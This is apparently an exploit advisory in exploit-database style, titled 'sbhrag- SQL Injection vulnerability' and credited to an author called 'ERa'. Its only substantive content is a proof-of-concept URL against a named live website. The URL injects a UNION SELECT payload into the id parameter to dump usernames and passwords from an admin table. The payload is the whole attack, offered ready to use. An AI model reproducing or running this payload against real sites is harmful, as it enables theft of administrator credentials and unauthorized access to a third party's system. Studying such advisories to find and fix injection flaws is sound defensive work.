-------------------------------------------------------------*
#Exploit Title: sbhrag- SQL Injection vulnerability
#Date: 2021-01-08
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://sbhrag.com/en/car.php?id=-17%27%20union%20select%201,2,3,4,group_concat(username,0x3a,password,%27%3Cbr%3E%27),6,7,8,9,10,11%20from%20admin--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*